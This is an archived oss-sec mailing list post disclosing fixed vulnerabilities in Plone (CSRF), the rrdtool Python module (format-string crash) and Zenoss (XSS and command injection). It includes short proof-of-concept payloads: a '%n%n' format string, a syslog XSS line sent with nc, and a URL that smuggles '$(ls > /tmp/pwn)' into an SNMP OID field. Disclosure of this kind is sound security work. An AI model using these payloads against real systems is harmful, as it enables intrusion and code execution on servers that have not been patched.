oss-sec mailing list archives
plone, rrdtool, zenoss bugs
From: Thomas Pollet <thomas.pollet () gmail com>
Date: Thu, 18 Apr 2013 14:05:42 +0200
Hi, I reported a csrf bug in plone pluggable authentication service, fixed in 4.2.5 http://plone.org/products/plone/releases/4.2.5 " CSRF protection for the ZODBUserManager, ZODBGroupManager, ZODBRoleManger, and DynamicGroupsPlugin plugins." Also, the rrdtool python module crashes on format string exploit $ python -c "import rrdtool rrdtool.graph('/tmp/out.png','-f','%n%n')" Segmentation fault this module is used by zenoss to create graphs (zenoss users are able to pass arguments to rrdtool). On zenoss, I reported some bugs to them (and to this list) which have been fixed in the latest release (4.2.3). for example, zenoss displayed syslog and snmp input without filtering html characters which results in xss. example syslog exploit : echo '<130>' Aug 29 07:17:34 test '<xss>' | nc -u zenoss 514 another bug was that the test_datasource feature doesn't escape the snmp oid which is passed by zenoss to the shell as an argument for the snmpwalk command example: https:// [ZENOSS_HOST]/zport/dmd/Devices/rrdTemplates/Device/datasources/sysUpTime/test_datasource?data={%22newId%22:%22DetectedVirus%22,%22oid%22:%22$%28ls%20%3E%20/tmp/pwn%29%22,%22enabled%22:%22on%22,%22testDevice%22:%22127.0.0.1%22,%22uid%22:%22%22} http://jira.zenoss.com/jira/browse/ZEN-3183 Cheers, T
Current thread:
- plone, rrdtool, zenoss bugs Thomas Pollet (Apr 18)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (Apr 18)
- Re: plone, rrdtool, zenoss bugs Matthew Wilkes (May 24)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (May 30)
- Re: plone, rrdtool, zenoss bugs Henri Salo (May 19)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (May 24)
- Re: plone, rrdtool, zenoss bugs Henri Salo (May 24)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (May 24)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (May 24)
- Re: plone, rrdtool, zenoss bugs Kurt Seifried (Apr 18)